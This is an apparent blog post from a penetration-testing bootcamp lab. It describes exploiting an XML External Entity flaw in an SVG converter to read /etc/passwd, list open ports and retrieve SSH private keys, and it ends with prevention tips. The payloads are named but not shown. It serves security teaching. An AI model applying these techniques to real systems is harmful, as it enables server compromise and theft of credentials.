What to do with XXE Vulnerability ?!!

Nairuz Abulhul
R3d Buck3T
Published in
5 min readJan 14, 2021

Enumeration, Data Exfiltration, and SSRF Attacks

I am currently taking Web Application Bootcamp by Vivek Ramachandran from Pentester Academy to refresh my testing skills for the OWASP top 10 vulnerabilities. What a better way to end the “unpredictable” year, right !!

I decided to share the testing methodology I developed while taking the class and solving the challenges.

Today, I will explore XML External Entity vulnerability aka XXE and how we can leverage it in performing data exfiltration and SSRF attacks.

Before we dive into it, let’s cover the fundamentals.

💭$_Key_Concepts:

  • XML External Entity Attack Overview
  • Impact
  • Exploitation Demo
  • Prevention
  • Resources

$_XML_External_Entity_Attack:

XML is a markup language designed for storing and transporting data. We commonly used in configuration files and web services. It uses tags similar to HTML.

XXE vulnerability is an attack against a vulnerable application that parses XML language with no security checks or validation. The attack uses XML external entities to retrieve contents from internal or external resources.

🔥$_Impact

  • Reading confidential data residing on the local system.
  • Performing server-side request forgery attacks in which an attacker sends requests to the vulnerable server to retrieve information that only available to that server.
  • Conducting local port scanning
  • Exfiltrating sensitive information such as SSH keys and configuration files that lead to full system compromise.

😈$_Exploitation_Time

I chose a vulnerable SVG Converter application on AttackDefense Lab to demonstrate the XXE vulnerability and its Impact.

When testing a web application, I try to collect as much information about the application either manually looking through the application’s source page, comments, hidden endpoints, or intercepting the requests with a proxy to investigate the server’s responses further.

At first sight, the application expects the user to upload an SVG image file and convert it to either PNG or PDF formats. SVG stands for scalable vector graphics, and it is a file format that allows you to display vector images on a web environment.

🔎$_My_Enumeration_steps:

  • Inspect All visible URLs
  • View the source page and look for hidden comments, API endpoints, storage locations
  • Check Enabled HTTP Methods
  • Gather information, if possible, through the server headers about the running infrastructure, application language, and used technologies.
  • Manually fuzz the application and observe the responses carefully with Burp Suite.
  • Inspect the type of data sent between the client and the application. Figuring out the data type narrows down the possible attack types.
  • Intentionally generate error messages to see if the application will show visible errors disclosing some interesting information that helps us understand its structure.
  • Automate the discovery of directories and endpoints.

Going through the above enumeration steps, I uploaded an SVG file as the application expected and intercepted the request for analysis. I see the passing data is in JSON and has 3 values: data, export_as, and headers.

I fuzzed each parameter to determine which value accepts XML data and send it to the server for parsing.

The data parameter is the only parameter that accepts XML input, and export_as works only with PDF value; PNG throws errors.

Then mapped the information I gathered with additional research on XML attacks. I found the possible vector would be XXE through Injecting the XML payload into SVG tagged file that executes once the server parses the SVG.

I used one of the XML/SVG payloads in the PayloadsAllTheThings in GitHub to confirm the vulnerability. I started with the known passwd file/etc/passwd to retrieve the server’s accounts.

$_XML_Payloads

Below are multiple payloads to use for retrieving different types of information:

  • Retrieve the hostname
  • Read /etc/passwd file
  • Check the server internal open ports
  • Retrieve SSH Private Keys
Host name payload
Read /etc/passwd file
Open Ports
SSH Private Key

As you see, with the above payloads, we are able to get back the sensitive contents from the server:

  • hostname ✔️
  • Users file [passwd]✔️
  • Current TCP connections to detect open ports✔️

SSH private key ✔️

Of course, with SSH, we have our foot on the server and fully compromise it.

$_Prevention

  • Sanitize XML data before trusting it.
  • Disable external entity and DTD processing altogether if possible.
  • Update XML libraries regularly.
  • Limit egress connections from the applications (only trusty connections)
  • and of course implement a WAF in front of the web application.

That would be it for today. Thanks a lot for reading !!!

--

--

Nairuz Abulhul
R3d Buck3T

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester [+] Publication: R3d Buck3T